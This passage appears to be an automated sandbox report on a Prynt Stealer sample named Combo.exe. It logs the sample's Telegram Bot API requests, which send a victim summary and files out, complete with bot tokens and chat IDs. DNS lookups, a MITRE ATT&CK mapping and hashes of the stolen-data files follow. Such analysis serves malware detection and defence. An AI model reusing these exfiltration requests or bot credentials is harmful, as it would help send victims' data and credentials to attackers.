%9F%91%A3%20*Local%20Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%91%A3%20*Files:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%206%0A%0A%20%20%F0%9F%91%A3%20Solen%20Useing%20Prynt%20Stealer%0A%0A%20%20%F0%9F%91%A3%20Developed%20By%20@FlatLineStealerUpdated%0A%0A%20%20%F0%9F%91%A3%20Or%20Join%20The%20Channel%20@pryntdotmarkettls, httpCc Combo.exe4.2kB 10.9kB 15 16
HTTP Request
GET https://api.telegram.org/bot7014456621:AAE7BXbm_jQfLpnUdyLpTUwGXyLN5AXvThw/sendMessage?chat_id=7389740990&text=%0A%20%20%F0%9F%91%A3%20*Prynt%20Stealer%20New%20Results:*%0ADate:%202024-09-12%207:37:02%20PM%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20Admin%0ACompName:%20SYMRKCCU%0ALanguage:%20%F0%9F%87%BA%F0%9F%87%B8%20en-US%0AAntivirus:%20Not%20installed%0A%0A%20%20%F0%9F%91%A3%20*IP%20Address:*%20%0AGateway%20IP:%2010.127.0.1%0AInternal%20IP:%2010.127.1.116%0AExternal%20IP:%20194.110.13.70%0ABSSID:%2002:79:a9:8c:1e:b7%0A%0A%20%20%F0%9F%91%A3%20*Hardware:*%0ACPU:%2012th%20Gen%20Intel(R)%20Core(TM)%20i5-12400%0AGPU:%20Microsoft%20Basic%20Display%20Adapter%0ARAM:%2016154MB%0AHWID:%20Unknown%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x720%0A%0A%20%20%F0%9F%91%A3%20*Domain%20Detects:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Banks*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto*%20(No%20data)%0A%0A%20%20%F0%9F%92%B5%20*Stealer%20Data:*%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%91%A3%20*Installed%20Software:*%0A%0A%20%20%F0%9F%91%A3%20*Local%20Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%91%A3%20*Files:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%206%0A%0A%20%20%F0%9F%91%A3%20Solen%20Useing%20Prynt%20Stealer%0A%0A%20%20%F0%9F%91%A3%20Developed%20By%20@FlatLineStealerUpdated%0A%0A%20%20%F0%9F%91%A3%20Or%20Join%20The%20Channel%20@pryntdotmarket&parse_mode=Markdown&disable_web_page_preview=TrueHTTP Response
200HTTP Request
GET https://api.telegram.org/bot7014456621:AAE7BXbm_jQfLpnUdyLpTUwGXyLN5AXvThw/sendMessage?chat_id=7389740990&text=%0A%20%20%F0%9F%91%A3%20*Prynt%20Stealer%20New%20Results:*%0ADate:%202024-09-12%207:37:02%20PM%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20Admin%0ACompName:%20SYMRKCCU%0ALanguage:%20%F0%9F%87%BA%F0%9F%87%B8%20en-US%0AAntivirus:%20Not%20installed%0A%0A%20%20%F0%9F%91%A3%20*IP%20Address:*%20%0AGateway%20IP:%2010.127.0.1%0AInternal%20IP:%2010.127.1.116%0AExternal%20IP:%20194.110.13.70%0ABSSID:%2002:79:a9:8c:1e:b7%0A%0A%20%20%F0%9F%91%A3%20*Hardware:*%0ACPU:%2012th%20Gen%20Intel(R)%20Core(TM)%20i5-12400%0AGPU:%20Microsoft%20Basic%20Display%20Adapter%0ARAM:%2016154MB%0AHWID:%20Unknown%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x720%0A%0A%20%20%F0%9F%91%A3%20*Domain%20Detects:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Banks*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto*%20(No%20data)%0A%0A%20%20%F0%9F%92%B5%20*Stealer%20Data:*%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%91%A3%20*Installed%20Software:*%0A%0A%20%20%F0%9F%91%A3%20*Local%20Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%91%A3%20*Files:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%206%0A%0A%20%20%F0%9F%91%A3%20Solen%20Useing%20Prynt%20Stealer%0A%0A%20%20%F0%9F%91%A3%20Developed%20By%20@FlatLineStealerUpdated%0A%0A%20%20%F0%9F%91%A3%20Or%20Join%20The%20Channel%20@pryntdotmarketHTTP Response
200 -
149.154.167.220:443https://api.telegram.org/bot7014456621:AAE7BXbm_jQfLpnUdyLpTUwGXyLN5AXvThw/sendDocument?chat_id=7389740990tls, httpCc Combo.exe87.2kB 8.0kB 79 29
HTTP Request
POST https://api.telegram.org/bot7014456621:AAE7BXbm_jQfLpnUdyLpTUwGXyLN5AXvThw/sendDocument?chat_id=7389740990HTTP Response
200 -
149.154.167.220:443https://api.telegram.org/bot1784055443:AAG-bXLYtnFpjJ_L3ogxA3bq6Mx09cqh8ug/sendDocument?chat_id=1937717367tls, httpCc Combo.exe86.9kB 7.8kB 73 38
HTTP Request
POST https://api.telegram.org/bot1784055443:AAG-bXLYtnFpjJ_L3ogxA3bq6Mx09cqh8ug/sendDocument?chat_id=1937717367HTTP Response
401 -
-
66 B 90 B 1 1
DNS Request
8.8.8.8.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
154.239.44.20.in-addr.arpa
-
74 B 128 B 1 1
DNS Request
172.214.232.199.in-addr.arpa
-
71 B 157 B 1 1
DNS Request
0.181.190.20.in-addr.arpa
-
73 B 144 B 1 1
DNS Request
95.221.229.192.in-addr.arpa
-
59 B 91 B 1 1
DNS Request
icanhazip.com
DNS Response
104.16.185.241104.16.184.241
-
62 B 94 B 1 1
DNS Request
api.mylnikov.org
DNS Response
172.67.196.114104.21.44.66
-
73 B 135 B 1 1
DNS Request
241.185.16.104.in-addr.arpa
-
62 B 78 B 1 1
DNS Request
api.telegram.org
DNS Response
149.154.167.220
-
73 B 135 B 1 1
DNS Request
114.196.67.172.in-addr.arpa
-
74 B 167 B 1 1
DNS Request
220.167.154.149.in-addr.arpa
-
56 B 72 B 1 1
DNS Request
google.com
DNS Response
172.217.169.14
-
72 B 146 B 1 1
DNS Request
26.165.165.52.in-addr.arpa
-
71 B 145 B 1 1
DNS Request
206.23.85.13.in-addr.arpa
-
70 B 133 B 1 1
DNS Request
107.12.20.2.in-addr.arpa
MITRE ATT&CK Enterprise v15
Persistence
Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3B
MD516a5cdae362b8d27a1d8f8c7b78b4330
SHA17edab1f00ca6b31e11f7eb2e61787ed747420923
SHA25600328ce57bbc14b33bd6695bc8eb32cdf2fb5f3a7d89ec14a42825e15d39df60
SHA5125085434c76cfd5687ea141f067922d9ba2e5690e712b0686678f2c61a90306edad1038c73d84b0bdc93159c2eedd508abc790c156b83b1255cb4b034da8bb09a
-
C:\Users\Admin\AppData\Local\9a7d8ba08df952c93e9cf5f3b54e1a84\Admin@SYMRKCCU_en-US\Browsers\Firefox\Bookmarks.txt
Filesize105B
MD52e9d094dda5cdc3ce6519f75943a4ff4
SHA15d989b4ac8b699781681fe75ed9ef98191a5096c
SHA256c84c98bbf5e0ef9c8d0708b5d60c5bb656b7d6be5135d7f7a8d25557e08cf142
SHA512d1f7eed00959e902bdb2125b91721460d3ff99f3bdfc1f2a343d4f58e8d4e5e5a06c0c6cdc0379211c94510f7c00d7a8b34fa7d0ca0c3d54cbbe878f1e9812b7
-
C:\Users\Admin\AppData\Local\9a7d8ba08df952c93e9cf5f3b54e1a84\Admin@SYMRKCCU_en-US\System\Process.txt
Filesize4KB
MD5d05fe6bef9a1b11c6bef3049843cfba5
SHA197183a14b14c4baddc87fe9aac8415942f06e8f3
SHA25607f5f8a705991c2018bf01c50c1d8b83d9869a9332901609f1a4ddc37a546acd
SHA512a1cf5bd3e9c23de61e501ed119f0e845f2517d97fa75887612bde7f5f5639a8c531c1eee182a98a7c73f18e3d42ba0b6e1e52103779aad67b46d1997a9713732